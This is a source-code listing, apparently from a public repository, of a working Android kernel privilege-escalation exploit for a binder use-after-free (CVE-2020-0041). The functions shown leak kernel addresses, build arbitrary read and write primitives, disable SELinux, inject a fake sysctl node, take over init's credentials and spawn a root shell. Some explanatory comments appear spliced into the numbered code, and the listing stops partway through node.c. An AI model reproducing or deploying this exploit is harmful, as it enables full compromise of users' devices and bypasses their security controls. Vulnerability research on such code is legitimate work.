385 |         node_th = pending_node_create(bs, uaf_node);
386 | 
387 |         if (th)
388 |             th[i] = node_th;
389 |     }
390 | 
391 |     int j;
392 |     for (j = 0; j < n2; j++) {
393 |         node_th = pending_node_create(bs, uaf_node2);
394 |         if (th)
395 |             th[i + j] = node_th;
396 |     }
397 | 
398 |     /* Now that we have pending nodes, we can release our references to them. */
399 |     binder_release(bs, uaf_node);
400 |     binder_release(bs, uaf_node2);
401 | 
402 |     /* Free the reserved buffer. Transactions from here on stay small enough
403 |      * that they won't require creating pending nodes, so freeing the
404 |      * reservation is safe.
405 |      */
406 |     bio_init(&msg, txn_data, sizeof(txn_data), 10);
407 |     bio_init(&reply, rdata, sizeof(rdata), 10);
408 | 
409 |     /* Free the reserved buffer. */
410 |     if (binder_call(bs, &msg, &reply, endpoint_handle, FREE_RESERVED_BUFFER) < 0) {
411 |         log_err("[-] Binder call FREE_RESERVED_BUFFER failed.\n");
412 |         exit(1);
413 |     }
414 |     binder_free_buffer(bs, reply.data0);
415 | 
416 |     /* Return the vma_start address to the caller. */
417 |     return vma_start;
418 | }
419 | 
420 | /*
421 |  * Read SELinux enforcing through selinuxfs.
422 |  */
423 | char read_selinux_enforcing() {
424 |     int fd = open("/sys/fs/selinux/enforce", O_RDONLY);
425 |     char enforcing;
426 |     read(fd, &enforcing, 1);
427 |     close(fd);
428 |     return enforcing;
429 | }
430 | 
431 | struct exp_node * file;
432 | int pipes[2];
433 | 
434 | /*
435 |  * 32-bit kernel read primitive using the corrupted f_inode, such that
436 |  * epitem.event.data overlaps with f_inode->i_sb.
437 |  */
438 | 
439 | uint64_t read32(uint64_t addr) {
440 |     struct epoll_event evt;
441 |     evt.events = 0;
442 |     evt.data.u64 = addr - 24;
443 |     int err = epoll_ctl(file->ep_fd, EPOLL_CTL_MOD, pipes[0], &evt);
444 |     uint32_t test = 0xdeadbeef;
445 |     ioctl(pipes[0], FIGETBSZ, &test);
446 |     return test;
447 | }
448 | 
449 | /*
450 |  * 64-bit kernel read primitive using read32
451 |  */
452 | 
453 | uint64_t read64(uint64_t addr) {
454 |     uint32_t lo = read32(addr);
455 |     uint32_t hi = read32(addr+4);
456 | 
457 |     return (((uint64_t)hi) << 32) | lo;
458 | }
459 | 
460 | void *ctl_table_uaddr;
461 | 
462 | /*
463 |  * 64-bit kernel write primitive using fake proc sysctl entry.
464 |  */
465 | void write64(uint64_t addr, uint64_t value) {
466 |     *(uint64_t *)(ctl_table_uaddr + 8) = addr; // data == what to read/write
467 |     *(uint32_t *)(ctl_table_uaddr + 16) = 0x8;
468 | 
469 |     char buf[100];
470 |     int fd = open(pathname, O_WRONLY);
471 |     if (fd < 0) {
472 |         printf("[!] Failed to open. Errno: %d\n", errno);
473 |     }
474 | 
475 |     sprintf(buf, "%u %u\n", (uint32_t)value, (uint32_t)(value >> 32));
476 |     int ret = write(fd, buf, strlen(buf));
477 |     if (ret < 0)
478 |         printf("[!] Failed to write, errno: %d\n", errno);
479 |     close(fd);
480 | }
481 | 
482 | /*
483 |  * 32-bit kernel write primitive using fake proc sysctl entry.
484 |  */
485 | void write32(uint64_t addr, uint32_t value) {
486 |     *(uint64_t *)(ctl_table_uaddr + 8) = addr; // data == what to read/write
487 |     *(uint32_t *)(ctl_table_uaddr + 16) = 4;
488 | 
489 |     char buf[100];
490 |     int fd = open(pathname, O_WRONLY);
491 |     sprintf(buf, "%u\n", value);
492 |     write(fd, buf, strlen(buf));
493 |     close(fd);
494 | }
495 | 
496 | /*
497 |  * Find a task given its PID, walking the task list from the given start task (normally init_task).
498 |  */
499 | uint64_t get_task_by_pid(uint64_t start, int pid) {
500 |     uint64_t task = read64(start + TASKS_OFFSET + 8) - TASKS_OFFSET;
501 | 
502 |     while (task != start) {
503 |         if (read32(task + PID_OFFSET) == pid) {
504 |             return task;
505 |         }
506 | 
507 |         /* Go to prev */
508 |         task = read64(task + TASKS_OFFSET + 8) - TASKS_OFFSET;
509 |     }
510 | 
511 |     return 0;
512 | }
513 | 
514 | 
515 | /*
516 |  * pwn!
517 |  */
518 | int main()
519 | {
520 |     int res = -1;
521 |     uint64_t A, B;
522 | 
523 | 
524 |     void *map = mmap((void *)(2 << 20), 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_POPULATE, -1, 0);
525 |     log_info("[+] Mapped %lx\n", map);
526 | 
527 |     /* We'll use one of these pipes for leaking its address and corrupting f_inode.
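 * How the read primitive behaves once f_inode is corrupted, roughly:
 * FIGETBSZ returns file->f_inode->i_sb->s_blocksize, and with f_inode
 * redirected into our epitem, epitem.event.data overlaps i_sb. read32()
 * therefore aims it at (addr - 24) -- 24 being s_blocksize's offset within
 * struct super_block on this kernel build -- so the ioctl hands back the
 * 32-bit word at addr.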
*/ 528 | pipe(&pipes[0]); 529 | 530 | pin_cpu(0); 531 | 532 | log_info("[+] selinux_enforcing before exploit: %c\n", read_selinux_enforcing()); 533 | 534 | struct binder_state *bs = binder_open(BINDER_DEVICE, 128 * 1024); 535 | if (!bs) { 536 | log_err("[-] Failed to open /dev/binder.\n"); 537 | exit(1); 538 | } 539 | 540 | /* Spawn the threads used for reallocating the dangling `binder_node` with controlled data. */ 541 | spawn_realloc_threads(); 542 | 543 | /* Step 1: leak a pipe file address */ 544 | 545 | file = node_new("leak_file"); 546 | 547 | /* Only works on file implementing the 'epoll' function. */ 548 | while (!node_realloc_epitem(file, pipes[0])) 549 | node_reset(file); 550 | 551 | uint64_t file_addr = file->file_addr; 552 | log_info("[+] pipe file: 0x%lx\n", file_addr); 553 | 554 | 555 | /* Step 2: leak epitem address */ 556 | struct exp_node *epitem_node = node_new("epitem"); 557 | while (!node_kaddr_disclose(file, epitem_node)) 558 | node_reset(epitem_node); 559 | 560 | printf("[*] file epitem at %lx\n", file->kaddr); 561 | 562 | /* 563 | * Alright, now we want to do a write8 to set file->f_inode. 564 | * Given the unlink primitive, we'll set file->f_inode = epitem + 80 565 | * and epitem + 88 = &file->f_inode. 566 | * 567 | * With this we can change f_inode->i_sb by modifying the epitem data, 568 | * and get an arbitrary read through ioctl. 569 | * 570 | * This is corrupting the fllink, so we better don't touch anything there! 571 | */ 572 | 573 | struct exp_node *write8_inode = node_new("write8_inode"); 574 | node_write8(write8_inode, file->kaddr + 120 - 40 , file_addr + 0x20); 575 | 576 | printf("[*] Write done, should have arbitrary read now.\n"); 577 | uint64_t fop = read64(file_addr + 0x28); 578 | printf("[+] file operations: %lx\n", fop); 579 | 580 | kernel_base = fop - OFFSET_PIPE_FOP; 581 | printf("[+] kernel base: %lx\n", kernel_base); 582 | 583 | /* Just a basic check */ 584 | if (read64(kernel_base + 0x38) != KERNEL_MAGIC) { 585 | printf("[*] Something went wrong with arbitrary read setup!?\n"); 586 | goto out; 587 | } 588 | 589 | /* Step 3: Disable selinux by writing NULL to selinux_enforcing */ 590 | struct exp_node *write8_selinux = node_new("write8_selinux"); 591 | node_write_null(write8_selinux, kernel_base + SELINUX_ENFORCING_OFFSET); 592 | 593 | /* 594 | * Step 4: Setup a fake sysctl node in our own userland page. We will start 595 | * by locating the kernel address of this page by parsing our own pgd. 596 | */ 597 | 598 | uint64_t init_task = kernel_base + INIT_TASK_OFFSET; 599 | uint64_t init_cred = read64(init_task + REAL_CRED_OFFSET); 600 | printf("[*] init_cred: %lx\n", init_cred); 601 | 602 | 603 | uint64_t current = get_task_by_pid(init_task, getpid()); 604 | if (current == 0) { 605 | printf("[*] Failed to find ourselves...\n"); 606 | goto out; 607 | } 608 | 609 | /* Now resolve our mapping at 2MB. 
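 * The walk below mirrors the AArch64 page tables (three levels with a 4KB
 * granule on this device): each level's entry holds a physical address,
 * which we mask down to its page frame and convert back to a kernel virtual
 * address with phys_to_virt(), i.e. virt = (phys - memstart_addr) |
 * 0xFFFFFFC000000000. One step of the walk, as a sketch:
 *
 *     entry    = read64(pgd);                               // level-1 descriptor
 *     next_tbl = phys_to_virt(((entry & 0xffffffffffff) >> 12) << 12);
 *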
But first read memstart_addr so we can do phys_to_virt() */ 610 | 611 | memstart_addr = read64(kernel_base + MEMSTART_ADDR_OFFSET); 612 | printf("[+] memstart_addr: 0x%lx\n", memstart_addr); 613 | uint64_t mm = read64(current + MM_OFFSET); 614 | uint64_t pgd = read64(mm + 0x40); 615 | uint64_t entry = read64(pgd); 616 | 617 | uint64_t next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); 618 | printf("[+] First level entry: %lx -> next table at %lx\n", entry, next_tbl); 619 | 620 | /* Offset 8 for 2MB boundary */ 621 | entry = read64(next_tbl + 8); 622 | next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); 623 | printf("[+] Second level entry: %lx -> next table at %lx\n", entry, next_tbl); 624 | 625 | entry = read64(next_tbl); 626 | uint64_t kaddr = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); 627 | 628 | 629 | *(uint64_t *)map = 0xdeadbeefbadc0ded; 630 | if ( read64(kaddr) != 0xdeadbeefbadc0ded) { 631 | printf("[!] Something went wrong resolving the address of our mapping\n"); 632 | goto out; 633 | } 634 | 635 | 636 | /* Now we can prepare our magic sysctl node as s child of the left-most node */ 637 | 638 | uint64_t sysctl_table_root = kernel_base + SYSCTL_TABLE_ROOT_OFFSET; 639 | printf("[+] sysctl_table_root = %lx\n", sysctl_table_root); 640 | uint64_t ctl_dir = sysctl_table_root + 8; 641 | 642 | uint64_t node = read64(ctl_dir + 80); 643 | uint64_t prev_node; 644 | while (node != 0) { 645 | prev_node = node; 646 | node = read64(node + 0x10); 647 | } 648 | 649 | /* We found the insertion place, setup the node */ 650 | 651 | uint64_t node_kaddr = kaddr; 652 | void *node_uaddr = map; 653 | 654 | uint64_t tbl_header_kaddr = kaddr + 0x80; 655 | void *tbl_header_uaddr = map + 0x80; 656 | 657 | uint64_t ctl_table_kaddr = kaddr + 0x100; 658 | ctl_table_uaddr = map + 0x100; 659 | 660 | uint64_t procname_kaddr = kaddr + 0x200; 661 | void * procname_uaddr = map + 0x200; 662 | 663 | /* Setup rb_node */ 664 | *(uint64_t *)(node_uaddr + 0x00) = prev_node; // parent = prev_node 665 | *(uint64_t *)(node_uaddr + 0x08) = 0; // right = null 666 | *(uint64_t *)(node_uaddr + 0x10) = 0; // left = null 667 | 668 | *(uint64_t *)(node_uaddr + 0x18) = tbl_header_kaddr; // my_tbl_header 669 | 670 | *(uint64_t *)(tbl_header_uaddr) = ctl_table_kaddr; 671 | *(uint64_t *)(tbl_header_uaddr + 0x18) = 0; // unregistering 672 | *(uint64_t *)(tbl_header_uaddr + 0x20) = 0; // ctl_table_arg 673 | *(uint64_t *)(tbl_header_uaddr + 0x28) = sysctl_table_root; // root 674 | *(uint64_t *)(tbl_header_uaddr + 0x30) = sysctl_table_root; // set 675 | *(uint64_t *)(tbl_header_uaddr + 0x38) = sysctl_table_root + 8; // parent 676 | *(uint64_t *)(tbl_header_uaddr + 0x40) = node_kaddr; // node 677 | *(uint64_t *)(tbl_header_uaddr + 0x48) = 0; // inodes.first 678 | 679 | /* Now setup ctl_table */ 680 | uint64_t proc_douintvec = kernel_base + PROC_DOUINTVEC_OFFSET; 681 | *(uint64_t *)(ctl_table_uaddr) = procname_kaddr; // procname 682 | *(uint64_t *)(ctl_table_uaddr + 8) = kernel_base; // data == what to read/write 683 | *(uint32_t *)(ctl_table_uaddr + 16) = 0x8; 684 | *(uint64_t *)(ctl_table_uaddr + 0x20) = proc_douintvec; // proc_handler 685 | *(uint32_t *)(ctl_table_uaddr + 20) = 0666; // mode = rw-rw-rw- 686 | 687 | /* 688 | * Compute and write the node name. We use a random name starting with aaa 689 | * for two reasons: 690 | * 691 | * - Must be the first node in the tree alphabetically given where we insert it (hence aaa...) 
692 | * 693 | * - If we already run, there's a cached dentry for each name we used earlier which has dangling 694 | * pointers but is only reachable through path lookup. If we'd reuse the name, we'd crash using 695 | * this dangling pointer at open time. 696 | * 697 | * It's easier to have a unique enough name instead of figuring out how to clear the cache, 698 | * which would be the cleaner solution here. 699 | */ 700 | 701 | int fd = open("/dev/urandom", O_RDONLY); 702 | uint32_t rnd; 703 | read(fd, &rnd, sizeof(rnd)); 704 | 705 | sprintf(procname_uaddr, "aaa_%x", rnd); 706 | sprintf(pathname, "/proc/sys/%s", procname_uaddr); 707 | 708 | /* And finally use a write8 to inject this new sysctl node */ 709 | struct exp_node *write8_sysctl = node_new("write8_sysctl"); 710 | node_write8(write8_sysctl, kaddr, prev_node + 16); 711 | 712 | /* Since our write is mirrored, let's clear the unwanted side-effect right away */ 713 | *(uint64_t *)(map + 8) = 0; 714 | 715 | printf("[+] Injected sysctl node!\n"); 716 | sleep(1); 717 | 718 | /* Set refcount to 0x100 and set our own credentials to init's */ 719 | write32(init_cred, 0x100); 720 | write64(current + REAL_CRED_OFFSET, init_cred); 721 | write64(current + REAL_CRED_OFFSET + 8, init_cred); 722 | 723 | if (getuid() != 0) { 724 | printf("[!!] Something went wrong, we're not root!!\n"); 725 | goto out; 726 | } 727 | 728 | /* Step Now we can clean things up. */ 729 | /* Cleanup the `sendmsg()` threads, which hold a reference to the freed 730 | * `binder_node`. 731 | */ 732 | struct exp_node *nodes[] = {write8_inode, write8_selinux, write8_sysctl}; 733 | for (int j = 0; j < 3; j++) { 734 | printf("[*] Node %s, pid %d, kaddr %lx\n", nodes[j]->name, nodes[j]->tid, nodes[j]->kaddr); 735 | if (!nodes[j]->tid) { 736 | printf("[*] Node %s has no thread id? \n", nodes[j]->name); 737 | continue; 738 | } 739 | /* Looking for pointers in the different nodes. */ 740 | uint64_t task = get_task_by_pid(init_task, nodes[j]->tid); 741 | if (!task) { 742 | printf("[!] Couldn't find task for pid %d\n", nodes[j]->tid); 743 | continue; 744 | } 745 | uint64_t kstack = read64(task + 0x28); 746 | 747 | for (int i = 0; i < 0x4000; i += 8) { 748 | if (read64(kstack + i) == nodes[j]->kaddr) { 749 | /* We overwrite with 0x10, as `kfree()` will not complain when encountering it, 750 | * contrary to the NULL ptr. 751 | */ 752 | log_info("[*] Replaced sendmmsg dangling reference\n"); 753 | write64(kstack + i, 0x10); 754 | } 755 | } 756 | 757 | kill(nodes[j]->tid, SIGKILL); 758 | waitpid(nodes[j]->tid, NULL, 0); 759 | } 760 | 761 | log_info("[+] Cleaned up sendmsg threads\n"); 762 | 763 | /* Bump up f_count to avoid entering into pipe_release() when exiting the process. */ 764 | write64(file_addr + 0x38, 0xff); 765 | 766 | /* Clear up our fake node */ 767 | write64(prev_node + 16, 0); 768 | 769 | /* We also smashed our epitem, try and restore that ... */ 770 | printf("[*] epitem.next = %lx\n", read64(file->kaddr + 88)); 771 | printf("[*] epitem.prev = %lx\n", read64(file->kaddr + 88 + 8)); 772 | 773 | // Just set next = prev, since we should be the only epitem here 774 | write64(file->kaddr + 88, read64(file->kaddr + 88 + 8)); 775 | 776 | /* Free all those pending nodes and threads */ 777 | node_free(file); 778 | node_free(epitem_node); 779 | node_free(write8_selinux); 780 | node_free(write8_inode); 781 | node_free(write8_sysctl); 782 | cleanup_realloc_threads(); 783 | 784 | 785 | 786 | /* We can finally enjoy our root shell. 
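Before the shell launches, a reference sketch of the fake `ctl_table` that made `write32()`/`write64()` possible. The field names follow the upstream 4.9 `struct ctl_table`; the offsets are exactly the ones the setup code pokes (`procname` at +0, `data` at +8, `maxlen` at +16, `mode` at +20, `proc_handler` at +0x20):

```
/* Layout of the fake sysctl table built above, annotated for
 * orientation (field names per the upstream struct ctl_table). */
struct fake_ctl_table {
    const char *procname;      /* 0x00: "aaa_<rnd>"                   */
    void *data;                /* 0x08: kernel address to read/write  */
    int maxlen;                /* 0x10: 8 for write64, 4 for write32  */
    unsigned short mode;       /* 0x14: 0666, world-readable/writable */
    struct ctl_table *child;   /* 0x18: unused here                   */
    void *proc_handler;        /* 0x20: proc_douintvec                */
};
```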
*/ 787 | log_info("[*] Launching privileged shell\n"); 788 | char *args[] = {"/system/bin/sh", NULL}; 789 | char *envp[] = {"PATH=/sbin:/system/sbin:/product/bin:/apex/com.android.runtime/bin:/system/bin:/system/xbin:/odm/bin:/vendor/bin:/vendor/xbin", "ANDROID_DATA=/data", "HOSTNAME=root_by_cve-2020-0041", NULL}; 790 | execve(args[0], args, envp); 791 | return 0; 792 | 793 | out: 794 | printf("[!] Sleeping forever since it's not safe to exit now...\n"); 795 | while(1) sleep(10); 796 | return -1; 797 | } -------------------------------------------------------------------------------- /lpe/src/helpers.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 1 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #include "helpers.h" 11 | #include "log.h" 12 | 13 | 14 | /* 15 | * Attach to a specific CPU. 16 | */ 17 | bool pin_cpu(int cpu) 18 | { 19 | cpu_set_t set; 20 | 21 | CPU_ZERO(&set); 22 | CPU_SET(cpu, &set); 23 | 24 | if (sched_setaffinity(0, sizeof(set), &set) < 0) { 25 | log_err("sched_setafinnity(): %s\n", strerror(errno)); 26 | return false; 27 | } 28 | 29 | return true; 30 | } 31 | -------------------------------------------------------------------------------- /lpe/src/log.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | ssize_t log_info(const char *format, ...) 7 | { 8 | va_list args; 9 | ssize_t len = 0; 10 | uint8_t buf[0x1000]; 11 | memset(buf, 0, 0x1000); 12 | va_start(args, format); 13 | len = vsnprintf(buf, INT_MAX, format, args); 14 | va_end(args); 15 | 16 | if (len > 0) 17 | write(1, buf, len); 18 | return len; 19 | } 20 | 21 | ssize_t log_err(const char *format, ...) 22 | { 23 | va_list args; 24 | ssize_t len = 0; 25 | uint8_t buf[0x1000]; 26 | memset(buf, 0, 0x1000); 27 | va_start(args, format); 28 | len = vsnprintf(buf, INT_MAX, format, args); 29 | va_end(args); 30 | 31 | if (len > 0) 32 | write(2, buf, len); 33 | return len; 34 | } 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /lpe/src/node.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #include "binder.h" 11 | #include "binder_lookup.h" 12 | #include "log.h" 13 | #include "exploit.h" 14 | #include "endpoint.h" 15 | #include "node.h" 16 | 17 | /* 18 | * Create a vulnerable dangling node within the binder transaction. 19 | */ 20 | static struct exp_node *_node_new(struct exp_node *node, const char *name) 21 | { 22 | struct binder_state *bs = NULL; 23 | pthread_t *uaf_node_th = NULL; 24 | //uint32_t num_pending = 0x40; 25 | uint32_t num_pending = 0x40; 26 | uint64_t vma_start = 0; 27 | uint64_t handle = 0; 28 | 29 | if (!node || !name) 30 | return NULL; 31 | 32 | bs = binder_open(BINDER_DEVICE, 128 * 1024); 33 | if (!bs) { 34 | return NULL; 35 | } 36 | 37 | handle = grab_handle(bs, name); 38 | if (!handle) 39 | return NULL; 40 | 41 | /* Prepare the pending nodes array. */ 42 | uaf_node_th = calloc(num_pending + 1, sizeof(pthread_t)); 43 | if (!uaf_node_th) { 44 | log_err("[-] Unable to allocate new pending node thread array. 
Reason: '%s'\n", strerror(errno)); 45 | goto err; 46 | } 47 | 48 | vma_start = setup_pending_nodes(bs, handle, uaf_node_th, num_pending, 0); 49 | if (!vma_start) { 50 | log_err("[-] Bug trigger failed.\n"); 51 | goto err; 52 | } 53 | 54 | /* Initialize exp_node. */ 55 | node->bs = bs; 56 | node->vma_start = vma_start; 57 | memset(node->name, 0, sizeof(node->name)); 58 | strncpy(node->name, name, sizeof(node->name) - 1); 59 | node->handle = handle; 60 | node->th = uaf_node_th; 61 | node->idx = 0; 62 | node->num_pending = num_pending; 63 | node->max = num_pending; 64 | node->second = false; 65 | node->target_fd = -1; 66 | node->ep_fd = -1; 67 | 68 | return node; 69 | 70 | err: 71 | if (uaf_node_th) 72 | free(uaf_node_th); 73 | 74 | return NULL; 75 | } 76 | 77 | /* 78 | * Create a new `exp_node`. 79 | */ 80 | struct exp_node *node_new(const char *name) 81 | { 82 | struct exp_node *node = NULL; 83 | 84 | node = calloc(1, sizeof(*node)); 85 | if (!node) { 86 | log_err("[-] Unable to allocate new node. Reason: '%s'\n", strerror(errno)); 87 | return NULL; 88 | } 89 | 90 | /* Need to bootstrap the associated endpoint. */ 91 | bootstrap_endpoint(name); 92 | 93 | if (!_node_new(node, name)) { 94 | free(node); 95 | return NULL; 96 | } 97 | 98 | return node; 99 | } 100 | 101 | /* 102 | * Free all pending node threads. 103 | */ 104 | void node_free_pending_nodes(struct exp_node *node) 105 | { 106 | int i; 107 | 108 | /* Terminate all pending nodes. */ 109 | for (i = 0; i < node->num_pending; i++) { 110 | pending_node_terminate(node->bs, node->handle, node->th[i]); 111 | } 112 | 113 | } 114 | 115 | /* 116 | * Free an exp_node, and the associated binder endpoint and pending 117 | * transactions as well. The only way to safely remove a dangling 118 | * `binder_node` from the `binder_proc` is to close the associated 119 | * file descriptor. 120 | */ 121 | static void _node_free(struct exp_node *node, bool reset) 122 | { 123 | 124 | int i; 125 | int n = node->num_pending; 126 | 127 | /* Terminate all pending nodes. */ 128 | for (i = 0; i < n; i++) { 129 | pending_node_terminate(node->bs, node->handle, node->th[i]); 130 | } 131 | 132 | /* Close binder. */ 133 | binder_close(node->bs); 134 | 135 | /* Close the remaining epitem if exists. */ 136 | if (node[0].ep_fd != -1) 137 | close(node[0].ep_fd); 138 | 139 | /* Reset the associated endpoint. */ 140 | if (reset) { 141 | //endpoint_reset(node->name); 142 | terminate_endpoint(node->name); 143 | bootstrap_endpoint(node->name); 144 | } else { 145 | terminate_endpoint(node->name); 146 | /* Free the memory associated with the node. */ 147 | free(node->th); 148 | free(node); 149 | } 150 | } 151 | 152 | /* 153 | * Free an `exp_node` and terminate the associated 154 | * endpoint. 155 | */ 156 | void node_free(struct exp_node *node) 157 | { 158 | _node_free(node, false); 159 | } 160 | 161 | /* 162 | * Reset an `exp_node` by restarting the remote endpoint. 163 | */ 164 | bool node_reset(struct exp_node *node) 165 | { 166 | uint8_t name[16]; 167 | 168 | memset(name, 0, sizeof(name)); 169 | strncpy(name, node->name, sizeof(name)-1); 170 | _node_free(node, true); 171 | 172 | /* Reinit node. */ 173 | if (_node_new(node, name)) 174 | return true; 175 | 176 | return false; 177 | } 178 | 179 | /* 180 | * Use the vulnerable to decrement the refcount of the underlying `binder_node` and have it eventually 181 | * be `kfree()`ed. 
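Before the lower-level pieces, a schematic of how the functions in this file chain together, mirroring the way `main()` in exploit.c drives them (`value` and `target_addr` are placeholder names, not from the source):

```
/* Schematic exp_node lifecycle, as driven by exploit.c. */
struct exp_node *n = node_new("demo");     /* dangling binder_node     */
while (!node_realloc_epitem(n, pipes[0]))  /* overlay a struct epitem  */
    node_reset(n);                         /* retry until it sticks    */
node_write8(n, value, target_addr);        /* unlink-style write8      */
node_free(n);                              /* tear down threads/binder */
```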
182 | */ 183 | void node_kfree(struct exp_node *node) 184 | { 185 | if (!node) 186 | return; 187 | 188 | pending_node_free(node->bs, node->handle, node->vma_start, node->num_pending + 1, 1, node->second); 189 | } 190 | 191 | 192 | 193 | #define NEPITEMS 0x20 194 | 195 | /* 196 | * This function is used to disclose a `file` structure from a given file descriptor. 197 | * It relies on the fact that we can leak data at offset 0x58 and 0x60 a `binder_node`, which 198 | * exactly overlap with linked list pointer of epitem structure pointing to the 'file' we 199 | * gave in parameter to `EPOLLCTL_ADD` 200 | */ 201 | static bool _disclose_file_addr(struct exp_node *node, int *ep_arr, int n) 202 | { 203 | uint64_t file_addr = 0; 204 | uint64_t origA, origB, A, B; 205 | int idx = -1; 206 | int i; 207 | 208 | if (!node || !ep_arr) 209 | return 0; 210 | 211 | /* leak the original value. */ 212 | node_leak(node, &origA, &origB); 213 | 214 | if (origA == 0 || origB == 0 || origB == 0xdead000000000200) 215 | return 0; 216 | 217 | /* Close the epitems by starting by the end of the array. */ 218 | i = n - 1; 219 | bool found = false; 220 | while (i >= 0) { 221 | /* Close 1 epitem. */ 222 | close(ep_arr[i]); 223 | ep_arr[i] = -1; 224 | 225 | /* Leak the result to see if something changed. */ 226 | node_leak(node, &A, &B); 227 | if (!found && (A != origA || B != origB)) { 228 | if (B == 0xdead000000000200) { 229 | return false; 230 | } 231 | idx = i - 1; 232 | i--; 233 | found = true; 234 | } 235 | i--; 236 | } 237 | 238 | /* Leak our values, we should have something interesting. */ 239 | node_leak(node, &A, &B); 240 | 241 | node->file_addr = A - 0xd8; 242 | node->ep_fd = ep_arr[idx]; 243 | 244 | return true; 245 | } 246 | 247 | /* 248 | * Free a `binder_node` and reallocates an `epitem` structure 249 | * in its place. 250 | */ 251 | bool node_realloc_epitem(struct exp_node *node, int fd) 252 | { 253 | bool res = false; 254 | struct epoll_event evt; 255 | uint64_t file_addr = 0; 256 | int ep_arr[NEPITEMS + 1]; 257 | int i, j, k, n; 258 | 259 | if (!node) 260 | return false; 261 | 262 | /* Prepare epoll structure. */ 263 | bzero(&evt, sizeof(evt)); 264 | evt.events = EPOLLIN; 265 | 266 | for (i = 0; i < NEPITEMS; i++) 267 | ep_arr[i] = -1; 268 | 269 | evt.data.fd = fd; 270 | epoll_ctl(ep_arr[0], EPOLL_CTL_ADD, fd, &evt); 271 | 272 | /* Allocate the epitems. */ 273 | for (i = 0; i < NEPITEMS; i++) { 274 | int ep = epoll_create1(0); 275 | if (ep < 0) { 276 | log_err("epoll_create1: '%s'\n", strerror(errno)); 277 | goto cleanup; 278 | } 279 | 280 | ep_arr[i] = ep; 281 | } 282 | 283 | /* Free the `binder_node`. */ 284 | node_kfree(node); 285 | 286 | /* Try to reallocate with `struct epitem`. */ 287 | for (i = 1; i < NEPITEMS; i++) { 288 | evt.data.fd = fd; 289 | epoll_ctl(ep_arr[i], EPOLL_CTL_ADD, fd, &evt); 290 | } 291 | 292 | if (!_disclose_file_addr(node, ep_arr, NEPITEMS)) 293 | goto cleanup; 294 | 295 | node->target_fd = fd; 296 | 297 | return true; 298 | 299 | cleanup: 300 | for (i = 0; i < NEPITEMS; i++) { 301 | if (ep_arr[i] != -1) 302 | close(ep_arr[i]); 303 | } 304 | 305 | return res; 306 | } 307 | 308 | 309 | /* 310 | * Disclose the kernel address of a `binder_node` by relying on 2 `binder_node` 311 | * whose content has been replaced by `epitem` structure. 312 | * We close the sprayed `epitem` structure, until we are sure about which epitem has 313 | * replace the content of our `binder_node`. 
By controlling 2 epitem which points back to each 314 | * other, we can disclose the content of both `binder_node` by reading the `prev` and `next` field 315 | * of the `epitem` structure, which in this case point to each other. 316 | */ 317 | bool node_kaddr_disclose(struct exp_node *node1, struct exp_node *node2) 318 | { 319 | 320 | uint64_t a0; 321 | uint64_t b0; 322 | uint64_t b1; 323 | uint64_t a1; 324 | 325 | if (!node1->file_addr || node1->target_fd == -1 || node2->target_fd != -1) 326 | return false; 327 | 328 | /* The node needs to be single. */ 329 | node_leak(node1, &a0, &b0); 330 | if (a0 != b0) 331 | return false; 332 | 333 | while (!node_realloc_epitem(node2, node1->target_fd)) 334 | node_reset(node2); 335 | 336 | /* Looks good, let's disclose the respective kaddrs. */ 337 | node_leak(node1, &a0, &b0); 338 | node_leak(node2, &a1, &b1); 339 | 340 | if (a0 == b1) { 341 | node1->kaddr = a1 - 0x58; 342 | node2->kaddr = b0 - 0x58; 343 | } else if (b0 == a1) { 344 | node2->kaddr = a0 - 0x58; 345 | node1->kaddr = b1 - 0x58; 346 | } else { 347 | return false; 348 | } 349 | 350 | return true; 351 | } 352 | 353 | 354 | /* 355 | * Free an epitem structure, by closing the file descriptor. 356 | * The only trouble here is the fact that it's freed using 357 | * `call_rcu()` which introduced indetermism when trying to replace 358 | * the freed content. 359 | */ 360 | bool node_free_epitem(struct exp_node *node) 361 | { 362 | if (!node || node->ep_fd == -1) 363 | return false; 364 | 365 | close(node->ep_fd); 366 | node->ep_fd = -1; 367 | /* Allow the CPU to enter quiescent state and free the `epitem`. */ 368 | usleep(10000); 369 | 370 | return true; 371 | } 372 | 373 | 374 | /* 375 | * This function is a little bit complicated (slow?), as it needs to replace a 376 | * `binder_node` with an epitem first, to disclose its kernel address, and then replace it 377 | * with controlled content using the `sendmsg()` threads to do so. The only trouble being 378 | * that the `epitem` structure is freed using `call_rcu()` which introduces indetermism. Therefore 379 | * it gets tricky to reliably reallocate the content of the `binder_node`. 380 | */ 381 | bool node_realloc_content(struct exp_node *node, void *data, size_t size) 382 | { 383 | bool res = false; 384 | uint64_t origA, A, B; 385 | 386 | if (!node) 387 | return false; 388 | 389 | 390 | setup_realloc_buffer(data, size); 391 | 392 | origA = *(uint64_t *)(data + 0x58); 393 | 394 | 395 | /* Decide which course of action to take. */ 396 | 397 | 398 | /* Do we have an overlay with an epitem? */ 399 | if (node->ep_fd != -1) { 400 | // Easy, just free the epitem. 401 | close(node->ep_fd); 402 | usleep(10000); 403 | node->ep_fd = -1; 404 | } else if (node->tid) { 405 | //DO we really want to do that? 406 | log_info("node->tid!!!!\n"); 407 | reset_realloc_threads(); 408 | return false; 409 | } else { 410 | /* It hasn't been freed, so just kfree it. */ 411 | node_kfree(node); 412 | } 413 | 414 | /* Let the threads spray kmalloc() with controlled content. */ 415 | realloc_barrier_wait(); 416 | /* Wait a little bit.*/ 417 | 418 | /* Leak new node value and hope for the best. */ 419 | node_leak(node, &A, &B); 420 | 421 | /* Double check to see if the node content was realloc properly. 
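As an aside, the two magic constants this file keeps subtracting deserve a note: 0x58 is the offset of `fllink` inside `struct epitem` and 0xd8 the offset of `f_ep_links` inside `struct file` on this build, so a leaked `fllink.next`/`prev` pointer converts back to the owning object by plain subtraction:

```
/* Pointer-to-object conversions implied by the code above (offsets are
 * the build-specific ones already hardcoded in this file). */
#include <stdint.h>

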